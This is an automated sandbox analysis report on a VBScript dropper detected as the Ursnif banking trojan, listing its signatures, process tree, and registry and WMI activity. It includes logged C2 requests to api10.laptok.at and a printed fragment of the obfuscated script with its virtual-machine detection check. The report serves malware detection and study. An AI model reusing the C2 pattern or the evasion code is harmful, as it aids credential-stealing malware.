Loading ...

Play interactive tourEdit tour

Analysis Report j2TrdIoHFE7b.vbs

Overview

General Information

Sample Name:j2TrdIoHFE7b.vbs
Analysis ID:284622
MD5:0671e735481a55031081895bf0f57760
SHA1:11788132e8b10e6370530d68d2d562737ef1dae0
SHA256:f9ad25e0810fc3f545213be438f531677595044c6a64d6b367e93b9aad9910e6

Most interesting Screenshot:

Detection

Ursnif
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5200 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\j2TrdIoHFE7b.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 1772 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 912 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1772 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • ssvagent.exe (PID: 4932 cmdline: 'C:\PROGRA~2\Java\JRE18~1.0_2\bin\ssvagent.exe' -new MD5: A3DBA514D38464A5C5A9DEA19E6159F9)
  • iexplore.exe (PID: 4136 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4664 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4136 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3848 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5620 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3848 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3940 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2948 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3940 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 4 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: j2TrdIoHFE7b.vbsVirustotal: Detection: 12%Perma Link
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
            Source: global trafficHTTP traffic detected: GET /api1/uP6dS_2BMjl_/2Ff6pE5oBHR/OL2vr5G67W_2Fz/1ONyiuhjZBmGx_2Fd2SwU/bs54JDJUaSah9Jpj/_2B6Uzn7v9dlVVZ/AQ_2FC0dEsmRmsdS0R/F3VycrnZL/1SLHPAgp2VELiwfZiUt7/IgzRq3adeaf8rKvMx9J/3sI2_2FYEFx138BFRXqa5c/UjcOYKjbdxyDe/3aFM_2F_/2FAGQ_2BPU5e_2Bvl0J1MyN/03QeuTUWO8/55YMNFd5cpVa_2FGC/GxLG7duFNVIb/g9odwiL9jNs/iIdlq_0A_0DrXj/F4r0mwPasaYBlGGWZY_2F/4tJN6AFTgTbJIl1E/N05mpOEU/l HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/xnSgUzPUlfzDY/NnQK_2FF/Kqmx7XhG7YFPPHp212iNaR7/TKvOl_2BtH/m3jG9qeTV83WDVAQZ/zMmfH0Ea5HKo/994rCMGbyXi/hc1IqdP_2FyYpK/vtsIYLFyt_2BhFTJdiogi/GtIZ00K3g_2Bxep2/9hRwhxl38Hpzw3J/f0zK5MJHl0QxCvZD8n/bXLIwWVOr/spTB6nLJPHHwRvgUQ6_2/BdmuHP1ixwgSHI1q_2B/D_2FHiYEFH4arvJUtMmnXV/gRfPMVSgmVKOv/GST2lC9_/0A_0DU5vH8Mj7f4sOWE5Xar/lEDvZ2EcY3/_2F2WFAa9gcoHv_2Bc/yxI0q HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/iSDZW0gW/FHitodpK1N7Y3oE1u77lQYK/IONG8VIzKH/siCwYSY2kuo4wx6EZ/8L2Qvw0eqUw2/I7NO1HjDrRE/5GanGbBobDoc58/na3Q_2B_2FJrpcag_2FIz/i_2BMAfwtqgEFSEb/roES8FF88GModpl/cCNa23kRLvGrKjLgwN/KcMhiO7TO/4cYxLFBZpQqgZc88hd3c/ibpkZm7KlqOOO2v40am/EqtUMS7vVjiizfWY1WwNev/A2AdVZSeKmkoR/DASGEzsI/B_2BUe_0A_0DiEmMjenNgW0/Y8O9rQwe7c/2jmiPy7O_2BOAvCUG/pWyxtMo_2BzW/HZr8FNXk1Fb/JDjG70ME/LE8 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/oNFCJaacsxr9zVG5bj17ms/ePPXDd0KRJ1NN/NoDjo_2B/A9PaE7o5ioMqdrDhcSgHt0q/hqUBq7_2BK/Cz1tc_2BmIjjY_2B1/X_2FA_2BNIbn/2XXfZ_2BGud/P_2FzEv3Fi9mMW/tz7jXdGGAmJwUKnNcW7rf/KwzL8ihIcssmFqzj/e0QKJF12ORg1C8D/OCrfBkhgfIH81_2FiS/D_2BtDEZM/gHCQeNjvYXpqsXIiMzI0/evEWqS87OUqzzCc3gie/kj5aSZ2XCD7TgwCnoiWpja/6T_0A_0DBKAjy/15PAX4zU/e2X_2BlnphvBKt8UNGf4uw5/CDcZDY8d0w/thBapLj_2B7mMFrnp/pry2Oag1/A HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/ByN_2Ba5pHmCUKwc/LkgDlS93ASX_2Bw/_2Bpmdzy9fRnvTk6J2/goHi0A6bz/oxCru_2FGYAoKpN1zBqI/gyCK_2FpAv2t0nWc62X/_2FqBH9kri5d_2FIIHQB_2/Fu49sKuTiZqQe/zsxykUCG/Vi2BTzaP8edSr97QiWG5hf2/sUXbjQP5DG/YgdiDn53bv80QUH_2/BEpbalczJFBY/yQjLswAPXgZ/qmZoG11Z1bPgRN/yxC7N6YFKVO9jwKxnNP2Q/LXm6IfbDjvgRxgab/HFXgIA_0A_0DYw1/4IfJg_2FJ0sYwMmurl/qqtg1KtFp/SZMupMmZc7imxqM976fJ/7_2Fsm5P_2FVJU7x9IO/9vnRp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/wBdLJFIdNx_2F0E/nNLvsuZSHH_2FIbeFO/BE_2F4JeP/LT0mwtJbAfsgn1xmPmx_/2F5GWbYEfy1Gn63M_2B/_2Bs_2Flhia2cKq3ICLgA_/2FrrGg7mff5yt/SHCKZ6Tt/xyzUgjPVIgTpnoiuMW7IoZh/trZ4_2BmAr/zrqIC4YIe30AKuzxr/_2BFVt4Y1si2/lG2lDpzdj8x/qDhb32vJ2RB9cw/Nv6OdMCf751A9V7ff0U7H/dYg_2BYJ5Ow4H2rJ/2RVPKE2XDgCzZvD/koDqnlklpic_0A_0D7/C_2B2kWa1/GtCSkY1vSD_2BaE_2FDJ/JPKuMU_2BzJ5nRmu2Rh/V_2FYT4X HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/DygN80dQ_2BaGuSVpw/bANybTlq9/wpkl21VRdQ3TOJrcRaki/FZVqBPUbvhW_2BevuKl/GsBt0aOTzVYILjUucpTmP4/FZ11lSAA7KpuP/ageZ9pl4/Lbx_2FqMifjto9D2TgNOLSm/rHbXQqvzm2/zc9SrIBa8GsUKdGWq/C19rQVqkDnok/qfqzhZ3cHL_/2FkfRgmSKc02tD/7tCvxVN8uUpHTZp4KEfSW/JAEh_2BSLVZ_2BaW/FZ4q2kGmWH13sfA/98VwVazRUpObuvF_2B/_0A_0DlIA/XUcbN5EORSjAIznJA9mu/MGJsQjUEqdRy7_2F0sJ/qRR9oiwuDII9gSGlKzkh4Z/v6_2BzWk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/ENCUp3cLC6Z/LW95Z9D36yFK4D/qH7UYy29VS6P_2BKM_2Fk/juKZHw8zHkx9tPZd/B50bfZIrBqteosk/CJptjbMR0sPNW7CF4Z/diMOw6_2B/hZXQegAXpR1H_2By1308/W1OKaX8HASjRi_2B4O2/iqoQaJiM5uNx8xQSB0rhwD/DGPZ1Z5Kt_2Bv/DSB8ZTgy/QdvVLguOqjtGwyAYypQ6vcr/_2B6FWVdQm/NCxdKQO08l7PEc1US/OiDObEdBtrZj/hPEKwFnNdti/vQlRA6G_0A_0DI/gUL6xS9K3ymLVjs9kIUwP/s0FhU8NVzdY0GJOd/_2FOLejWQ7ReClt/cG9z9ntbZ/0OeJbJ6Q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/Q2S_2F_2FF_2F/Jhc84r6W/DOdsfq1FICiKIl9m89pH2t_/2FEZdM7j2g/a3lQN9HeeevGGQ7Wl/s_2B2sW2rm0U/caU9Q6rqhhd/Un0FHNyGMazt8c/iD8NOmeCMDoBFUEIooO_2/BJ9ch4AjrHdPedaU/P9J_2Bk7eAjNekL/b_2BiB8Rm72z572xvk/PSFJu_2BC/zU8_2FrlvdK8cTzsDUvT/xe_2BPtFUbeEsYQG8DW/QQ1jc_2Fh1EDMGidoE2z7o/nnhRtZzQbv4d8/20sYbms2/Cx2Yks8_0A_0D8qF7EAUhSN/UclxjJkn7Z/r_2BpY3wUzeaX2Jom/FPWWpglAd7Ai/liPPD6IfqjF8KpHITg/Pgj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/fqNQ_2FXTt2dTj/CXII90dg5f79HV7B_2Bij/21yB93hsr_2Byb3f/e9_2B3XStOM0iUH/zosE6zTnwL3_2B2pxj/KgAtNGysF/STFb73TfWMEYCYogYbSC/4sRVEeHsCAIArG1GGyy/vsEWC_2BjcYCXxSqZ5d06n/2QDk3EZo3I_2B/DjHer5KB/xYxvHTvipDezh_2BNMjwj1Q/wMoiXn0yAe/vpduI6SN217a5FOMl/anSg_2Bf_2Be/mELPiRo_2Fg/CqK5biWJyRoWdb/Ydi_2FUwlo6S7S_0A_0Dg/G6DVtJSxKKfsoBe6/DP1E3QO3mAGXQJ_/2Fqc8P7fao3284R/H8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/ERlhcvFaXd/GqSHxNi2o8a9pppFq/1US1edpWD9vt/ERJVbq2exXK/uYEcBxYQ0puwql/adlEZyCqctF1gLl43_2FK/ldMnWMiy86CvhbpI/LM3FeoIcqaGMkHh/3VwE7Lwos2Yt70oN8b/bPPFOLM2g/vNtyHqpevUDMD93vtWEX/LeOxmXDE8OQsvaav4SK/rPAkQ8Horb_2BK7NJ8agHA/cqNhQ56Fed7Xa/FDSO66_2/BERxE_2FmU86HAgyp8f7lVa/zbsdreY_2F/cnlq_0A_0DnHC9UV_/2Fr8H9SBNERe/ZLfJT25voLa/f7CVerY2F8FJw4/R9LvlRTUrCR7rbsOBasXk/R7Lfj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/lJIp4mf7_2BHiHGjPW/6ZRg2WIT1/7uGoCxsojDNfoPbj9Wxl/hqqWeeZmVPj58xCWyVu/gbcAcLbRVkaRprhKatQUzQ/CzHq4b1HXLIRv/tD71xUEX/yhD0s2LEisn9DP3fb9y_2FS/yaqoRhWXoD/dmQ71UvJHQb0YYWD1/w6GXtgWTsLpo/g7X1iEbrcnz/zuRQoun2QL0s44/aPD9DTQLj5GVmSaO3W2_2/BhAbhdZAcY0pxyXn/61rBwIodyEKJKtm/kPyCgy5Bat_0A_0DeA/WjFuraS5f/aUBIfgwXw_2Bktr9W66N/ctPiHxpVrOQyr2FtfzK/PDFs0PO36brJZd/_2BfLcAc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/wSD_2FKZHisrP/MO_2BDWP/0zhoZvR2AmI6pPiHI9HdvxQ/UYayVW6KUF/p3e869GjGFi18Gu5_/2BIz0dYK5Fkk/NBvumHMvGek/SHygw4g0M4CvzV/IIUw5JYAv4bjWpGiNfVUm/xAmnPrJH6Gb_2FV0/xNsncwTIasTPfyJ/_2B8N0UizCVL02fLVe/BCNolMG4b/TmAoNUJhn5xMYnZzAYwk/dB0L8V0_2Fn9rbkxZOR/cnb4TZXrfoY5dOrbrfIKgC/v3sxNfnjH2UUo/tEn_0A_0/D9tZVyorkcCZANi_2BwmPR_/2F37SK3V6j/CNHSOE_2F94veTxkh/6NGIxtR34t0f/NmqZfZThSzd3/S HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: msapplication.xml1.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb70c1d67,0x01d688aa</date><accdate>0xb70c1d67,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb70c1d67,0x01d688aa</date><accdate>0xb70c1d67,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb710e244,0x01d688aa</date><accdate>0xb710e244,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb710e244,0x01d688aa</date><accdate>0xb710e244,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb713446d,0x01d688aa</date><accdate>0xb713446d,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb713446d,0x01d688aa</date><accdate>0xb713446d,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Sep 2020 17:15:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: msapplication.xml.12.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.12.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.12.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.12.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.12.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.12.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.12.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.12.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333618475.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333591183.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333702930.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333727521.0000000005578000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333618475.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333591183.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333702930.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.333727521.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: j2TrdIoHFE7b.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dll
            Source: classification engineClassification label: mal92.troj.evad.winVBS@15/42@14/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\j2TrdIoHFE7b.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: j2TrdIoHFE7b.vbsVirustotal: Detection: 12%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\j2TrdIoHFE7b.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1772 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe 'C:\PROGRA~2\Java\JRE18~1.0_2\bin\ssvagent.exe' -new
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4136 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3848 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3940 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1772 CREDAT:17410 /prefetch:2
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe 'C:\PROGRA~2\Java\JRE18~1.0_2\bin\ssvagent.exe' -new
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4136 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3848 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3940 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync
            Source: j2TrdIoHFE7b.vbsStatic file information: File size 1452344 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: c:\meet\well\Brought\story\During\2\claim\84\Could\6\Element\Motion\3\Shore\market.pdb source: ogress.psd.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(555551152)) > 0 And astronomy146 = 0) ThenExit Function' gargle triphammer fusillade Emile goober height Colombia317 Cameroon infantile macaque Virgil15 larynx Blair Vassar citron Marjory319 ticket Horowitz doubt pounce genius prolate expurgate trichloroethane hap114 gurgle spear Tommie stereo contraption clank710 counterfeit boutique teenage attrition stratify stannic polysemous volcanism candle stenographer649 noontime metallography, 8485223 chrome night clapboard squalid wacky. 1611065 iambic Belgrade697 peaceful kickback formulaic versus tuff598 xerox899 gaur registrable quagmire. distort767 bodybuilding channel diagrammed parolee900 Balzac. acme. Kirkpatrick stardom virgin payroll688, 230300 Corbett646 Isaiah tectonic Sharon787 abolition planet nightshade Bini touchdown condescension effusion728 societal proverbial822 raven erosion twig gadgetry. cavalier townsmen Arlen solitary exclusive Togo side960 crore gardenia skyhook proctor End IfSet waggle651 = GetObject("winmgmts:\\.\root\cimv2")Set adjust193lItems = waggle651.ExecQuery("Select * from Win32_Processor", , ((46 + 34.0) + (-((88 + (-60.0)) + 4.0))))For Each glycine543 In adjust193lItemsIf glycine543.NumberOfCores < (((1786 - 1758.0) + (40 + (-30.0))) - 35.0) ThenISsAHR = TrueREM soup extent populism curvilinear Ethiopia290 adposition lineman glycerinate77 Hillcrest Vance scapula metazoa console48 athletic herringbone raillery jure adorn fiance Middlesex miniature58 spiritual McHugh813 Bengal repelling pyrotechnic bivalve215 Cottrell Sandburg seder swart murk comprehend serology Tunis souvenir362 hoodlum quartile pike switchboard clairvoyant arabesque580 continual bindle collard616 chassis rainy fifteenth 